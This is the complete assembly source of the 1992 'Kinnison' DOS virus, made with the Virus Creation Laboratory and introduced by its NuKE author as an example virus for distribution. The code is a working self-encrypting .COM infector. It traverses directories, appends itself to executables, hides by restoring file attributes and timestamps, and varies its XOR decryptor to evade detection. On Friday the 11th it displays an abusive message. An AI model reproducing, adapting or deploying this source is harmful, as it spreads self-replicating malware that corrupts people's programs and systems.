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- A few notes on the Kinnison Virus
- ---------------------------------
- Kinnison was made with VCL 0.75 beta, and its source was unmodified.
- The resulting .COM was attached to a dummy file (5 NOPs and an INT 020h)
- so that it would be encrypted (it uses a self-modifying XOR encryption
- routine that 's only twelve bytes long). It is a self-encrypting
- appending .COM infector. It has a 50% chance of spreading down the
- directory tree on each execution. The Kinnison virus goes off every
- Friday the 11th, the weekday and date that Sam Kinnison was killed in an
- auto accident. At that point Kinnison "screams" at the user. Nothing
- else is done, and there is no disk damage.
- If you have any comments or suggestions for Kinnison (which I plan to
- distribute with VCL as an example virus) or VCL (code, etc.), please let
- me know.
- Thanks.
- --Nowhere Man, [NuKE] '92
- ; KINNISON.ASM -- Sam Kinnison virus
- ; Created by Nowhere Man's Virus Creation Labratory v0.75
- ; Written by Nowhere Man
- virus_type equ 0
- code segment 'CODE'
- assume cs:code,ds:code,es:code,ss:code
- org 0100h
- main proc near
- flag: mov ah,0
- nop
- nop
- jmp start ;Would be at start of victim
- nop
- nop
- start: call find_offset ; Push IP on to stack, advance IP
- find_offset:pop di ; DI holds old IP
- sub di,3 ; Adjust for length of CALL
- lea si,[di + start_of_code - start] ; SI points to code
- call encrypt_decrypt ; Decrypt the code
- start_of_code label near
- push di ; Save DI
- mov si,offset flag ; SI points to flag bytes
- lea di,[di + new_jump - start] ;DI points 2 start of jmp
- movsw ; Transfer two bytes
- movsw ; Transfer two bytes
- pop di ; Restore DI
- push di ; And save it for later
- lea si,[di + buffer - start]; SI points to old start
- mov di,0100h ; DI points to start of code
- movsw ; Transfer two bytes
- movsw ; Transfer two bytes
- movsw ; Transfer two bytes
- movsb ; Transfer final byte
- pop di ; Restore DI
- mov bp,sp ; BP points to stack
- sub sp,128 ;Allocate 128 bytes on stack
- mov ah,02Fh ; DOS get DTA function
- int 021h
- push bx ;Save old DTA address on stack
- mov ah,01Ah ; DOS set DTA function
- lea dx,[bp - 128] ;DX points to buffer on stack
- int 021h
- call get_day
- cmp ax,000Bh
- jne end00
- call get_weekday
- cmp ax,0005h
- jne end00
- mov cx,0003h
- call beep
- end00: xor ah,ah ; BIOS get time function
- int 01Ah
- test dx,0001h
- jne no_infection
- call search_files
- no_infection:
- call get_day
- cmp ax,000Bh
- jne end01
- call get_weekday
- cmp ax,0005h
- jne end01
- lea si,[di + data00 - start] ; SI points to data
- call display_string
- end01: pop dx ; DX holds original DTA address
- mov ah,01Ah ; DOS set DTA function
- int 021h
- mov sp,bp ; Deallocate local buffer
- mov di,0100h ; Push 0100h on to stack for
- push di ; return to main program
- xor ax,ax ;
- mov bx,ax ;
- mov cx,ax ;
- mov dx,ax ; Empty out the registers
- mov si,ax ;
- mov di,ax ;
- mov bp,ax ;
- ret ; Return to original program
- main endp
- search_files proc near
- push bp ; Save BP
- mov bp,sp ; BP points to local buffer
- sub sp,64 ; Allocate 64 bytes on stack
- mov ah,047h ; DOS get current dir function
- xor dl,dl ; DL holds drive # (current)
- lea si,[bp - 64] ;SI points to 64-byte buffer
- int 021h
- mov ah,03Bh ; DOS change directory function
- lea dx,[di + root - start] ;DX points to root directory
- int 021h
- call traverse ; Start the traversal
- mov ah,03Bh ; DOS change directory function
- lea dx,[bp - 64] ; DX points to old directory
- int 021h
- mov sp,bp ; Restore old stack pointer
- pop bp ; Restore BP
- ret ; Return to caller
- root db "\",0 ; Root directory
- search_files endp
- traverse proc near
- push bp ; Save BP
- mov ah,02Fh ; DOS get DTA function
- int 021h
- push bx ; Save old DTA address
- mov bp,sp ; BP points to local buffer
- sub sp,128 ;Allocate 128 bytes on stack
- mov ah,01Ah ; DOS set DTA function
- lea dx,[bp - 128] ; DX points to buffer
- int 021h
- mov ah,04Eh ; DOS find first function
- mov cx,00010000b ; CX holds search attributes
- mov dx,offset all_files ; DX points to "*.*"
- int 021h
- jc leave_traverse ; Leave if no files present
- check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
- jne another_dir ; If not, try again
- cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
- je another_dir ;If so, keep going
- mov ah,03Bh ; DOS change directory function
- lea dx,[bp - 98] ; DX points to new directory
- int 021h
- call traverse ; Recursively call ourself
- mov ah,03Bh ; DOS change directory function
- lea dx,[di + up_dir - start]; DX points to parent dir
- int 021h
- another_dir:
- mov ah,04Fh ; DOS find next function
- int 021h
- jnc check_dir ; If found check the file
- leave_traverse:
- lea dx,[di + com_mask - start] ; DX points to "*.COM"
- call find_files ; Try to infect a file
- done_searching:
- mov sp,bp ; Restore old stack frame
- mov ah,01Ah ; DOS set DTA function
- pop dx ; Retrieve old DTA address
- int 021h
- pop bp ; Restore BP
- ret ; Return to caller
- up_dir db "..",0 ; Parent directory name
- all_files db "*.*",0 ; Directories to search for
- com_mask db "*.COM",0 ; Mask for all .COM files
- traverse endp
- find_files proc near
- push bp ; Save BP
- mov ah,02Fh ; DOS get DTA function
- int 021h
- push bx ; Save old DTA address
- mov bp,sp ; BP points to local buffer
- sub sp,128 ;Allocate 128 bytes on stack
- push dx ; Save file mask
- mov ah,01Ah ; DOS set DTA function
- lea dx,[bp - 128] ; DX points to buffer
- int 021h
- mov ah,04Eh ; DOS find first file function
- mov cx,00100111b ; CX holds all file attributes
- pop dx ; Restore file mask
- find_a_file:
- int 021h
- jc done_finding ; Exit if no files found
- call infect_file ; Infect the file!
- jnc done_finding ; Exit if no error
- mov ah,04Fh ;DOS find next file function
- jmp short find_a_file ; Try finding another file
- done_finding:
- mov sp,bp ; Restore old stack frame
- mov ah,01Ah ; DOS set DTA function
- pop dx ; Retrieve old DTA address
- int 021h
- pop bp ; Restore BP
- ret ; Return to caller
- find_files endp
- infect_file proc near
- mov ah,02Fh ; DOS get DTA address function
- int 021h
- mov si,bx ; SI points to the DTA
- mov ax,04301h ; DOS set file attributes function
- xor cx,cx ; Clear all attributes
- lea dx,[si + 01Eh] ; DX points to victim's name
- int 021h
- mov ax,03D02h ; DOS open file function,r/w
- int 021h
- xchg bx,ax ; BX holds file handle
- mov ah,03Fh ;DOS read from file function
- mov cx,7 ; CX holds bytes to read (7)
- lea dx,[di + buffer - start]; DX points to buffer
- int 021h
- push si ;Save DTA address before compare
- mov byte ptr [di + set_carry - start],0 ;Assume we'll fail
- lea si,[di + buffer - start]; SI points to comparison
- push di ; Save virus offset
- lea di,[di + new_jump - start] ; DI points to virus flg
- mov cx,4 ; CX holds number of bytes
- rep cmpsb ; Compare the first
- pop di ; Restore DI
- je close_it_up ; If equal then close up
- mov byte ptr [di + set_carry - start],1 ; Success --
- cwd ; Zero CX _ Zero bytes from
- mov cx,dx ; Zero DX /
- mov ax,04200h ; DOS file seek function,
- int 021h
- mov ax,04202h ; DOS file seek function,EOF
- cwd ; Zero DX _ Zero bytes from
- mov cx,dx ; Zero CX /
- int 021h
- sub ax,7 ; Prepare for JMP
- mov word ptr [di + new_jump + 5 - start],ax ; Construct
- call encrypt_code ; Make an encrypted copy of
- mov ah,040h ; DOS write to file function
- mov cx,finish - start ; CX holds virus length
- lea dx,[di + finish - start] ;DX points to encrypted copy
- int 021h
- cwd ; Zero DX _ Zero bytes from
- mov cx,dx ; Zero CX /
- mov ax,04200h ; DOS file seek function,
- int 021h
- mov ah,040h ; DOS write to file function
- mov cx,7 ; CX holds bytes to write (7
- lea dx,[di + new_jump - start] ; DX points to the jump
- int 021h
- close_it_up:
- pop si ; Restore DTA address
- mov ax,05701h ; DOS set file time function
- mov cx,[si + 016h] ; CX holds old file time
- mov dx,[si + 018h] ; DX holds old file date
- int 021h
- mov ah,03Eh ; DOS close file function
- int 021h
- mov ax,04301h ; DOS set file attributes fu
- xor ch,ch ; Clear CH for file attribut
- mov cl,[si + 015h] ; CX holds file's old attrib
- lea dx,[si + 01Eh] ; DX points to victim's name
- int 021h
- infection_done: cmp byte ptr [di + set_carry - start],1 ; Set carry
- ret ; Return to caller
- set_carry db ? ; Set-carry-on-exit flag
- buffer db 5 dup (090h),0CDh,020h ; Buffer to hold test
- new_jump db 4 dup (?),0E9h,?,? ; New jump to virus
- infect_file endp
- beep proc near
- jcxz beep_end ; Exit if there are no
- mov ax,0E07h ; BIOS display char.BELL
- beep_loop: int 010h ; Beep
- loop beep_loop ; Beep until --CX = 0
- beep_end: ret ; Return to caller
- beep endp
- display_string proc near
- mov ah,0Eh ; BIOS display char. fun
- display_loop: lodsb ; Load the next char. in
- or al,al ; Is the character a nul
- je disp_strnend ; If it is, exit
- int 010h ; BIOS video interrupt
- jmp short display_loop ; Do the next character
- disp_strnend: ret ; Return to caller
- display_string endp
- get_day proc near
- mov ah,02Ah ; DOS get date function
- int 021h
- mov al,dl ; Copy day into AL
- cbw ; Sign-extend AL into AX
- ret ; Return to caller
- get_day endp
- get_weekday proc near
- mov ah,02Ah ; DOS get date function
- int 021h
- cbw ; Sign-extend AL into AX
- ret ; Return to caller
- get_weekday endp
- data00 db "DIE BITCH!!!!! AHHHHHHHH!!!!!!!",13,10,0
- vcl_marker db "[VCL]",0 ; VCL creation
- note db "Dedicated to the memory of"
- db " Sam Kinnison 1954-1992",0
- db "[Kinnison]",0
- db "Nowhere Man, [NuKE] '92",0
- encrypt_code proc near
- push bx ; Save BX
- push di ; Save DI
- lea si,[di + encrypt_decrypt - start] ; SI points
- xor ah,ah ; BIOS get time function
- int 01Ah
- or dx,1 ; Insure we never get 0
- mov word ptr [si + 5],dx ; Low word of timer is n
- alter_flag: mov al,0 ; AL holds alteration fl
- inc byte ptr [di + (alter_flag + 1) - start] ; Togg
- test al,1 ; Is bit one set?
- jne check_nop ; If not then don't togg
- xor byte ptr [si],0110b ; Change all BPs in star
- xor byte ptr [si + 4],010b ; to BXs, and vice-versa
- xor byte ptr [si + 7],0110b ;
- check_nop: test al,2 ; Is bit two set?
- jne do_encryption ; If not then don't togg
- mov ax,word ptr [si + 7] ; AX holds INC/NOP
- xchg ah,al ; Exchange position of I
- mov word ptr [si + 7],ax ; Put the word back
- do_encryption: mov si,di ; SI points to start of
- lea di,[di + finish - start] ; DI points past
- mov cx,(finish - start) / 2 ; CX holds words to tran
- rep movsw ; Copy the code
- pop di ; Restore DI
- lea si,[di + (finish + (start_of_code - start)) - start]
- ; SI points to code to encrypt
- call encrypt_decrypt ; Encrypt the code
- pop bx ; Restore BX
- ret ; Return to caller
- encrypt_code endp
- even ; Must be on an even bou
- end_of_code label near
- encrypt_decrypt proc near
- mov bp,end_of_code - start_of_code - 2 ; BP holds
- xor_loop: db 081h,032h,00h,00h ; XOR a word with the ke
- dec bp ; Do the next byte
- nop ; Used to throw off dete
- jne xor_loop ; Repeat until we're don
- ret ; Return to caller
- encrypt_decrypt endp
- finish label near
- code ends
- end main
- Downloaded From P-80 International Information Systems 304-744-2253